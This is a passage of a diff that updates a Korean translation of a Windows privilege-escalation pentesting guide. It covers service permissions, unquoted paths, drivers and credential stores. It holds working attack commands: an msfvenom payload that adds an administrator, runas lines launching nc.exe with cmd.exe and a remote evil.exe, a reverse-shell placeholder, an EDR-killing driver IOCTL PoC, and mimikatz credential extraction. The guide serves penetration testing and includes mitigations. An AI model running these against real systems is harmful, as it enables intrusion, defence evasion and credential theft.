Hijacking**](dll-hijacking/index.html))**.**\ +서비스에서 실행되는 모든 바이너리는 **wmic** (system32가 아닌 곳)을 사용해 얻을 수 있으며, 권한은 **icacls**로 확인할 수 있습니다: ```bash for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt @@ -519,10 +518,10 @@ sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt ``` -### Services registry modify permissions +### 서비스 레지스트리 수정 권한 -어떤 service registry든 수정할 수 있는지 확인해야 합니다.\ -다음과 같이 service **registry**에 대한 **권한**을 **확인**할 수 있습니다: +서비스 레지스트리를 수정할 수 있는지 확인해야 합니다.\ +서비스 **레지스트리**에 대한 **권한**을 **확인**하려면 다음을 수행하세요: ```bash reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services @@ -531,7 +530,7 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" ``` -다음과 같이 **Authenticated Users** 또는 **NT AUTHORITY\INTERACTIVE**가 `FullControl` 권한을 가지고 있는지 확인해야 합니다. 그렇다면 서비스에서 실행되는 바이너리를 변경할 수 있습니다. +서비스가 **Authenticated Users** 또는 **NT AUTHORITY\INTERACTIVE**에 `FullControl` 권한을 가지고 있는지 확인해야 한다. 만약 그렇다면, 서비스에서 실행되는 바이너리를 변경할 수 있다. 실행되는 바이너리의 경로를 변경하려면: ```bash @@ -539,7 +538,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t RE ``` ### 서비스 레지스트리 AppendData/AddSubdirectory 권한 -레지스트리에 대해 이 권한이 있다면 이는 **해당 레지스트리에서 하위 레지스트리를 생성할 수 있다**는 의미입니다. Windows 서비스의 경우 이는 **임의의 코드를 실행하기에 충분합니다:** +레지스트리에 대해 이 권한이 있으면 **이 레지스트리에서 하위 레지스트리를 생성할 수 있습니다**. Windows 서비스의 경우 이는 **임의의 코드를 실행하기에 충분합니다:** {{#ref}} @@ -548,15 +547,15 @@ appenddata-addsubdirectory-permission-over-service-registry.md ### 따옴표 없는 서비스 경로 -실행 파일의 경로가 따옴표로 감싸져 있지 않으면, Windows는 공백 이전의 모든 경로 조각을 차례로 실행하려고 시도합니다. +실행 파일 경로가 따옴표로 묶여 있지 않으면, Windows는 공백이 나오기 전의 각 부분 경로를 실행하려고 시도합니다. -예를 들어 경로 _C:\Program Files\Some Folder\Service.exe_ 의 경우 Windows는 다음을 실행하려고 시도합니다: +예를 들어, 경로 _C:\Program Files\Some Folder\Service.exe_ 의 경우 Windows는 다음을 실행하려고 시도합니다: ```bash C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe ``` -내장된 Windows 서비스에 속한 항목을 제외하고, 인용 부호가 없는 모든 서비스 경로를 나열: +내장 Windows 서비스에 속한 항목을 제외하고 모든 따옴표 없는 서비스 경로를 나열하세요: ```bash wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"' wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services @@ -576,19 +575,20 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && ```bash gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -**탐지 및 악용할 수 있습니다** 이 취약점은 metasploit의 `exploit/windows/local/trusted\_service\_path`로 탐지·악용할 수 있습니다. metasploit로 서비스 바이너리를 수동으로 생성할 수 있습니다: +**이 취약점을 탐지하고 악용할 수 있습니다** metasploit로: `exploit/windows/local/trusted\_service\_path` +metasploit로 서비스 바이너리를 수동으로 생성할 수 있습니다: ```bash msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe ``` ### 복구 작업 -Windows에서는 서비스가 실패할 경우 수행할 작업을 지정할 수 있습니다. 이 기능은 특정 binary를 가리키도록 구성할 수 있습니다. 해당 binary를 교체할 수 있다면 privilege escalation이 발생할 수 있습니다. 자세한 내용은 [공식 문서]()를 참조하세요. +Windows에서는 서비스가 실패할 경우 수행할 작업을 사용자가 지정할 수 있습니다. 이 기능은 특정 binary를 가리키도록 구성할 수 있습니다. 이 binary를 교체할 수 있다면 privilege escalation이 가능할 수 있습니다. 자세한 내용은 [공식 문서]()를 참조하세요. ## 애플리케이션 ### 설치된 애플리케이션 -**binaries의 권한**(아마도 하나를 덮어써서 privilege escalation이 가능할 수 있습니다) 및 **폴더**의 권한도 확인하세요 ([DLL Hijacking](dll-hijacking/index.html)). +**permissions of the binaries**와 **folders**의 권한을 확인하세요 (아마 하나를 덮어써서 privilege escalation이 가능할 수 있습니다). ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" @@ -599,9 +599,9 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### 쓰기 권한 -특정 파일을 읽기 위해 일부 config file을 수정할 수 있는지, 또는 Administrator 계정으로 실행될 바이너리(schedtasks)를 수정할 수 있는지 확인하세요. +일부 구성 파일을 수정하여 특정 파일을 읽을 수 있는지, 또는 관리자 계정으로 실행될 바이너리를 수정할 수 있는지(schedtasks)를 확인하세요. -시스템에서 취약한 폴더/파일 권한을 찾는 한 가지 방법은 다음과 같습니다: +시스템에서 취약한 폴더/파일 권한을 찾는 방법은 다음과 같습니다: ```bash accesschk.exe /accepteula # Find all weak folder permissions per drive. @@ -627,7 +627,7 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac ### 시작 시 실행 **다른 사용자가 실행할 registry 또는 binary를 덮어쓸 수 있는지 확인하세요.**\ -**읽어보세요** **다음 페이지**에서 흥미로운 **autoruns locations to escalate privileges**에 대해 더 알아보세요: +**읽어보세요** **다음 페이지**에서 흥미로운 **autoruns locations를 통한 권한 상승**에 대해 더 알아보세요: {{#ref}} @@ -636,29 +636,61 @@ privilege-escalation-with-autorun-binaries.md ### 드라이버 -가능한 **타사 이상/취약한** 드라이버를 찾아보세요 +가능한 **서드파티의 이상하거나 취약한** 드라이버를 찾아보세요 ```bash driverquery driverquery.exe /fo table driverquery /SI ``` -드라이버가 arbitrary kernel read/write primitive를 노출(잘못 설계된 IOCTL handlers에서 흔함)하면, kernel memory에서 SYSTEM token을 직접 훔쳐 권한을 상승시킬 수 있습니다. 단계별 기법은 다음을 참조하세요: +If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step‑by‑step technique here: {{#ref}} arbitrary-kernel-rw-token-theft.md {{#endref}} +#### 디바이스 객체에서 FILE_DEVICE_SECURE_OPEN 누락 악용 (LPE + EDR kill) + +일부 서명된 서드파티 드라이버는 IoCreateDeviceSecure를 통해 강력한 SDDL로 디바이스 객체를 생성하지만 DeviceCharacteristics에서 FILE_DEVICE_SECURE_OPEN을 설정하는 것을 잊습니다. 이 플래그가 없으면, 추가 구성 요소가 포함된 경로로 디바이스를 열 때 secure DACL이 적용되지 않아, 권한이 없는 사용자가 다음과 같은 네임스페이스 경로를 사용해 핸들을 얻을 수 있습니다: + +- \\ .\\DeviceName\\anything +- \\ .\\amsdk\\anyfile (실제 사례에서) + +사용자가 디바이스를 열 수 있게 되면, 드라이버가 노출한 privileged IOCTLs를 LPE 및 변조에 악용할 수 있습니다. 실제 사례에서 관찰된 예시 기능: +- 임의 프로세스에 대한 전체 접근 핸들을 반환 (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser). +- 제한 없는 raw disk read/write (오프라인 변조, 부팅 시점 persistence 트릭). +- Protected Process/Light (PP/PPL)를 포함한 임의 프로세스를 종료할 수 있어, 커널을 통해 user land에서 AV/EDR 종료가 가능해집니다. + +최소 PoC 패턴 (user mode): +```c +// Example based on a vulnerable antimalware driver +#define IOCTL_REGISTER_PROCESS 0x80002010 +#define IOCTL_TERMINATE_PROCESS 0x80002048 + +HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0); +DWORD me = GetCurrentProcessId(); +DWORD target = /* PID to kill or open */; +DeviceIoControl(h, IOCTL_REGISTER_PROCESS, &me, sizeof(me), 0, 0, 0, 0); +DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0); +``` +개발자를 위한 완화 조치 +- DACL로 제한하려는 디바이스 객체를 생성할 때 항상 FILE_DEVICE_SECURE_OPEN을 설정하세요. +- 권한 있는 작업에서는 호출자 컨텍스트를 검증하세요. 프로세스 종료나 핸들 반환을 허용하기 전에 PP/PPL 체크를 추가하세요. +- IOCTLs를 제약하세요 (access masks, METHOD_*, 입력 검증) 그리고 직접 커널 권한 대신 brokered models를 고려하세요. + +방어자를 위한 탐지 아이디어 +- 의심스러운 디바이스 이름(예: \\ .\\amsdk*)의 user-mode 오픈과 남용을 시사하는 특정 IOCTL 시퀀스를 모니터링하세요. +- Microsoft의 취약한 드라이버 차단 목록(HVCI/WDAC/Smart App Control)을 적용하고 자체 허용/차단 목록을 유지하세요. + ## PATH DLL Hijacking -PATH에 있는 폴더에 **쓰기 권한**이 있으면 프로세스가 로드하는 DLL을 가로채 **권한 상승**을 할 수 있습니다. +만약 PATH에 포함된 폴더 안에 **write permissions**가 있다면, 프로세스에서 로드된 DLL을 하이재킹하여 **escalate privileges**할 수 있습니다. -PATH에 있는 모든 폴더의 권한을 확인하세요: +Check permissions of all folders inside PATH: ```bash for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) ``` -이 검사를 악용하는 방법에 대한 자세한 내용은 다음을 참조하세요: - +이 검사를 악용하는 방법에 대한 자세한 정보: {{#ref}} dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md @@ -697,34 +729,34 @@ netstat -ano #Opened ports? route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex ``` -### ARP 테이블 +### ARP 표 ``` arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ``` -### Firewall Rules +### 방화벽 규칙 [**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(규칙 나열, 규칙 생성, 끄기, 끄기...)** -추가[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) +더 많은[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl) ```bash C:\Windows\System32\bash.exe C:\Windows\System32\wsl.exe ``` -바이너리 `bash.exe`는 또한 `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`에서 찾을 수 있습니다. +바이너리 `bash.exe`는 `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`에서도 찾을 수 있습니다. -root user를 얻으면 어떤 포트에서든 리스닝할 수 있습니다(처음으로 `nc.exe`로 포트를 리스닝할 때 GUI를 통해 `nc`를 방화벽에서 허용할지 묻습니다). +root user 권한을 얻으면 어떤 포트에서든 수신(listen)할 수 있습니다(포트에서 `nc.exe`를 처음 사용해 수신하면 GUI를 통해 `nc`를 firewall에서 허용할지 묻습니다). ```bash wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -간편하게 bash를 root로 시작하려면 `--default-user root`를 시도해보세요 +간단히 root 권한으로 bash를 시작하려면 `--default-user root`를 시도해보세요 -다음 폴더에서 `WSL` 파일시스템을 탐색할 수 있습니다: `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` +`WSL` 파일시스템은 다음 폴더에서 탐색할 수 있습니다: `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` ## Windows 자격 증명 @@ -742,14 +774,14 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef ``` ### Credentials manager / Windows vault -출처: [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ -Windows Vault는 서버, 웹사이트 및 기타 프로그램에 대한 사용자 자격증명을 저장하며, 이는 **Windows**가 **log in the users automaticall**y 할 수 있는 경우에 해당합니다. 언뜻 보면 사용자가 Facebook 자격증명, Twitter 자격증명, Gmail 자격증명 등을 저장해 브라우저를 통해 자동으로 로그인하게 할 수 있다고 생각할 수 있지만, 그렇지 않습니다. +From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ +Windows Vault는 서버, 웹사이트 및 기타 프로그램에 대한 사용자 자격 증명을 저장하며, **Windows**가 **사용자를 자동으로 로그인시킬 수 있는** 경우에 사용됩니다. 처음 보면 사용자가 Facebook 자격 증명, Twitter 자격 증명, Gmail 자격 증명 등을 저장해 브라우저를 통해 자동으로 로그인하도록 하는 기능처럼 보일 수 있습니다. 하지만 그렇지 않습니다. -Windows Vault는 Windows가 사용자를 자동으로 로그인시킬 수 있는 자격증명을 저장합니다. 이는 어떤 **Windows application that needs credentials to access a resource** (서버나 웹사이트)도 **can make use of this Credential Manager** 및 Windows Vault를 이용해 사용자가 매번 사용자 이름과 비밀번호를 입력하는 대신 제공된 자격증명을 사용할 수 있다는 뜻입니다. +Windows Vault는 Windows가 사용자를 자동으로 로그인시킬 수 있는 자격 증명을 저장합니다. 즉, 어느 **Windows 애플리케이션이 리소스에 접근하기 위해 자격 증명이 필요한 경우**(서버 또는 웹사이트) **이 Credential Manager를 사용할 수 있으며** Windows Vault에 저장된 자격 증명을 사용하여 사용자가 매번 사용자 이름과 비밀번호를 입력하는 대신 해당 자격 증명을 사용할 수 있다는 뜻입니다. -애플리케이션이 Credential Manager와 상호작용하지 않는 한 특정 자원에 대한 자격증명을 사용할 수 없을 것입니다. 따라서 애플리케이션이 vault를 사용하려면 기본 저장 vault에서 해당 자원의 자격증명을 요청하기 위해 어떻게든 **communicate with the credential manager and request the credentials for that resource**해야 합니다. +응용프로그램이 Credential Manager와 상호작용하지 않는 한, 해당 리소스에 대한 자격 증명을 사용할 수 없을 것 같습니다. 따라서 애플리케이션이 vault를 사용하려면 기본 저장 vault에서 해당 리소스의 자격 증명을 **Credential Manager와 통신하여 요청해야** 합니다. -`cmdkey`를 사용하여 머신에 저장된 자격증명을 나열하세요. +저장된 자격 증명을 나열하려면 `cmdkey`를 사용하세요. ```bash cmdkey /list Currently stored credentials: @@ -757,49 +789,49 @@ Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` -그런 다음 저장된 자격 증명을 사용하려면 `runas`를 `/savecred` 옵션과 함께 사용할 수 있습니다. 다음 예제는 SMB 공유를 통해 원격 바이너리를 호출하는 예입니다. +그런 다음 저장된 자격 증명을 사용하기 위해 `/savecred` 옵션과 함께 `runas`를 사용할 수 있습니다. 다음 예시는 SMB 공유를 통해 원격 바이너리를 호출하는 것입니다. ```bash runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` -제공된 credential 세트를 사용하여 `runas` 실행. +제공된 자격 증명으로 `runas` 사용하기. ```bash C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" ``` -Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), 또는 [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1)에서 가져올 수 있다는 점에 유의하세요. +Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1). ### DPAPI -**Data Protection API (DPAPI)**는 데이터의 대칭 암호화를 위한 방법을 제공하며, 주로 Windows 운영체제에서 비대칭 개인키들의 대칭 암호화에 사용됩니다. 이 암호화는 엔트로피에 크게 기여하는 사용자 또는 시스템 비밀을 활용합니다. +The **Data Protection API (DPAPI)**는 대칭 암호화 방식으로 데이터를 보호하는 방법을 제공하며, 주로 Windows 운영체제 내에서 비대칭 개인키의 대칭적 암호화에 사용됩니다. 이 암호화는 사용자 또는 시스템의 비밀을 활용하여 엔트로피에 크게 기여합니다. -**DPAPI는 사용자의 로그인 비밀에서 유도된 대칭 키를 통해 키를 암호화할 수 있게 합니다**. 시스템 암호화의 경우 시스템의 도메인 인증 비밀을 사용합니다. +**DPAPI는 사용자의 로그인 비밀에서 유도된 대칭 키를 통해 키를 암호화할 수 있게 합니다**. 시스템 암호화의 경우에는 시스템의 도메인 인증 비밀을 사용합니다. -DPAPI를 사용해 암호화된 사용자 RSA 키는 `%APPDATA%\Microsoft\Protect\{SID}` 디렉터리에 저장되며, 여기서 `{SID}`는 사용자의 [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier)를 나타냅니다. **동일 파일에 사용자의 개인 키를 보호하는 마스터 키와 함께 저장되는 DPAPI 키는** 일반적으로 64바이트의 랜덤 데이터로 구성됩니다. (이 디렉터리에 대한 접근이 제한되어 있어 CMD의 `dir` 명령으로는 내용을 나열할 수 없지만 PowerShell에서는 나열할 수 있다는 점에 유의하세요.) +DPAPI를 사용하여 암호화된 사용자 RSA 키는 %APPDATA%\Microsoft\Protect\{SID} 디렉터리에 저장되며, 여기서 `{SID}`는 사용자의 [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier)를 의미합니다. **DPAPI 키는 사용자의 개인 키를 보호하는 마스터 키와 동일한 파일에 함께 위치**하며, 일반적으로 64바이트의 무작위 데이터로 구성됩니다. (이 디렉터리에 대한 접근은 제한되어 있어 CMD에서 `dir` 명령으로 내용을 나열할 수 없지만, PowerShell을 통해서는 나열할 수 있다는 점에 유의하세요). ```bash Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\ Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\ ``` -적절한 인자(`/pvk` 또는 `/rpc`)와 함께 **mimikatz module** `dpapi::masterkey`를 사용하여 이를 복호화할 수 있습니다. +적절한 인수(`/pvk` 또는 `/rpc`)와 함께 **mimikatz module** `dpapi::masterkey`를 사용하여 이를 복호화할 수 있습니다. -**마스터 암호로 보호된 credentials files**는 일반적으로 다음 위치에 있습니다: +**마스터 비밀번호로 보호된 credentials files**은 보통 다음 위치에 있습니다: ```bash dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ ``` -적절한 `/masterkey`를 이용해 **mimikatz module** `dpapi::cred`로 decrypt할 수 있다.\ -루트 권한이 있다면 `sekurlsa::dpapi` module으로 **memory**에서 **extract many DPAPI** **masterkeys**를 추출할 수 있다. +적절한 `/masterkey`와 함께 **mimikatz module** `dpapi::cred`를 사용해 복호화할 수 있습니다.\ +루트 권한이 있는 경우 `sekurlsa::dpapi` 모듈을 사용하여 **extract many DPAPI** **masterkeys** from **memory** 할 수 있습니다. {{#ref}} dpapi-extracting-passwords.md {{#endref}} -### PowerShell 자격 증명 +### PowerShell Credentials -**PowerShell credentials**는 일반적으로 **scripting** 및 자동화 작업에서 암호화된 자격 증명을 편리하게 저장하는 용도로 자주 사용된다. 해당 자격 증명은 **DPAPI**로 보호되며, 일반적으로 생성된 동일한 사용자 및 동일한 컴퓨터에서만 decrypted될 수 있다. +**PowerShell credentials** 는 편리하게 암호화된 credentials 를 저장하기 위한 **scripting** 및 자동화 작업에 자주 사용됩니다. 해당 credentials 는 **DPAPI** 로 보호되며, 일반적으로 생성된 동일한 컴퓨터에서 동일한 사용자만 복호화할 수 있습니다. -파일에 들어있는 PS credentials를 **decrypt**하려면 다음과 같이 하면 된다: +To **decrypt** a PS credentials from the file containing it you can do: ```bash PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml' PS C:\> $credential.GetNetworkCredential().username @@ -821,10 +853,10 @@ cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| ``` ### 저장된 RDP 연결 -다음 위치에서 확인할 수 있습니다: `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ +다음 위치에서 찾을 수 있습니다: `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ 및 `HKCU\Software\Microsoft\Terminal Server Client\Servers\` -### 최근 실행된 명령 +### 최근 실행한 명령 ``` HCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU @@ -833,27 +865,20 @@ HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ``` %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings ``` -Use the **Mimikatz** `dpapi::rdg` module with appropriate `/masterkey` to **decrypt any .rdg files`\ -적절한 `/masterkey`를 사용하여 **Mimikatz** `dpapi::rdg` 모듈로 모든 .rdg 파일을 **복호화**하세요.\ -You can **extract many DPAPI masterkeys** from memory with the Mimikatz `sekurlsa::dpapi` module -Mimikatz `sekurlsa::dpapi` 모듈을 사용하면 메모리에서 많은 DPAPI masterkeys를 **추출**할 수 있습니다. +Use the **Mimikatz** `dpapi::rdg` module with appropriate `/masterkey` to **decrypt any .rdg files**\ +Mimikatz `sekurlsa::dpapi` 모듈로 메모리에서 많은 DPAPI masterkeys를 추출할 수 있습니다. ### Sticky Notes -People often use the StickyNotes app on Windows workstations to **save passwords** and other information, not realizing it is a database file. This file is located at `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` and is always worth searching for and examining. -사람들은 종종 Windows 워크스테이션에서 StickyNotes 앱을 데이터베이스 파일인 것을 모른 채 **비밀번호를 저장**하거나 기타 정보를 기록하는 데 사용합니다. 이 파일은 `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`에 위치하며 항상 찾아보고 검사할 가치가 있습니다. +사람들은 종종 Windows 워크스테이션에서 StickyNotes app을 사용해 **비밀번호** 및 기타 정보를 저장하는데, 이것이 데이터베이스 파일이라는 사실을 모르는 경우가 많습니다. 이 파일은 `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite`에 위치하며 항상 찾아보고 검사할 가치가 있습니다. ### AppCmd.exe **Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.**\ -**AppCmd.exe** is located in the `%systemroot%\system32\inetsrv\` directory.\ -If this file exists then it is possible that some **credentials** have been configured and can be **recovered**. -**AppCmd.exe**에서 비밀번호를 복구하려면 관리자 권한으로 실행하고 높은 무결성(High Integrity) 수준에서 실행해야 한다는 점을 유의하세요.\ **AppCmd.exe**는 `%systemroot%\system32\inetsrv\` 디렉터리에 있습니다.\ -이 파일이 존재하면 일부 **credentials**가 구성되어 있고 **복구**될 가능성이 있습니다. +이 파일이 존재한다면 일부 **credentials**가 구성되어 있고 **recovered**될 수 있습니다. -This code was extracted from [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): -이 코드는 [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1)에서 추출되었습니다: +This code was extracted from [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): ```bash function Get-ApplicationHost { $OrigError = $ErrorActionPreference @@ -933,8 +958,8 @@ $ErrorActionPreference = $OrigError ``` ### SCClient / SCCM -해당 경로에 `C:\Windows\CCM\SCClient.exe` 가 존재하는지 확인하세요 .\ -설치 프로그램은 **run with SYSTEM privileges**, 많은 설치 프로그램이 **DLL Sideloading (정보 출처** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** +`C:\Windows\CCM\SCClient.exe`가 존재하는지 확인하세요 .\ +설치 프로그램은 **run with SYSTEM privileges**, 많은 것이 **DLL Sideloading (Info from** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** ```bash $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion if ($result) { $result } @@ -950,22 +975,22 @@ reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_ ``` reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ ``` -### 레지스트리의 SSH 키 +### 레지스트리의 SSH keys -SSH 개인 키는 레지스트리 키 `HKCU\Software\OpenSSH\Agent\Keys`에 저장될 수 있으므로, 그 안에 흥미로운 항목이 있는지 확인해야 합니다: +SSH private keys는 레지스트리 키 `HKCU\Software\OpenSSH\Agent\Keys` 안에 저장될 수 있으므로, 그곳에 흥미로운 내용이 있는지 확인해야 합니다: ```bash reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys' ``` -해당 경로에서 항목을 발견하면 대부분 저장된 SSH 키일 가능성이 큽니다. 암호화되어 저장되지만 [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract)를 사용하면 쉽게 복호화할 수 있습니다.\ -이 기술에 대한 자세한 정보: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) +해당 경로에서 항목을 찾으면 대부분 저장된 SSH key일 것입니다. 암호화되어 저장되어 있지만 [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract)를 사용하면 쉽게 복호화할 수 있습니다.\ +More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) If `ssh-agent` service is not running and you want it to automatically start on boot run: ```bash Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service ``` > [!TIP] -> 이 기술은 더 이상 유효하지 않은 것 같습니다. ssh 키를 생성하고 `ssh-add`로 추가한 뒤 ssh로 머신에 로그인해 보았습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys가 존재하지 않으며 procmon은 비대칭 키 인증 과정에서 `dpapi.dll`의 사용을 식별하지 못했습니다. - +> 이 기술은 더 이상 유효하지 않은 것 같습니다. ssh 키를 생성하고 `ssh-add`로 추가한 뒤 ssh로 머신에 로그인하려고 시도했습니다. 레지스트리 HKCU\Software\OpenSSH\Agent\Keys는 존재하지 않았고 procmon은 비대칭 키 인증 중 `dpapi.dll`의 사용을 식별하지 못했습니다. + ### 무인 파일 ``` C:\Windows\sysprep\sysprep.xml @@ -981,9 +1006,9 @@ C:\unattend.txt C:\unattend.inf dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul ``` -이 파일들은 **metasploit**을 사용하여 검색할 수도 있습니다: _post/windows/gather/enum_unattend_ +이 파일들은 **metasploit**의 _post/windows/gather/enum_unattend_ 모듈을 사용하여 검색할 수도 있습니다. -예시 내용: +예제 내용: ```xml @@ -1024,13 +1049,15 @@ AppData\Roaming\gcloud\access_tokens.db ``` ### McAfee SiteList.xml -### 캐시된 GPP 패스워드 +파일 **SiteList.xml**을 찾으세요 -이전에 Group Policy Preferences (GPP)를 통해 여러 대의 머신에 사용자 지정 로컬 관리자 계정을 배포할 수 있는 기능이 있었습니다. 그러나 이 방법에는 심각한 보안 결함이 있었습니다. 첫째, SYSVOL에 XML 파일로 저장된 Group Policy Objects (GPOs)는 도메인의 모든 사용자가 접근할 수 있었습니다. 둘째, 이러한 GPP 내의 암호는 공개 문서화된 기본 키를 사용해 AES256으로 암호화되어 있었지만, 인증된 어떤 사용자라도 이를 복호화할 수 있었습니다. 이는 사용자가 권한 상승을 얻을 수 있게 할 수 있어 심각한 위험을 초래했습니다. +### 캐시된 GPP 암호 -이 위험을 완화하기 위해, "cpassword" 필드가 비어 있지 않은 로컬에 캐시된 GPP 파일을 검색하는 함수가 개발되었습니다. 해당 파일을 찾으면 함수는 암호를 복호화하고 사용자 정의 PowerShell 객체를 반환합니다. 이 객체에는 GPP 및 파일 위치에 대한 세부 정보가 포함되어 있어 이 보안 취약점을 식별하고 수정하는 데 도움이 됩니다. +이전에는 Group Policy Preferences (GPP)를 통해 다수의 머신에 사용자 정의 로컬 관리자 계정을 배포할 수 있는 기능이 있었습니다. 그러나 이 방법에는 심각한 보안 결함이 있었습니다. 첫째, SYSVOL에 XML 파일로 저장된 Group Policy Objects 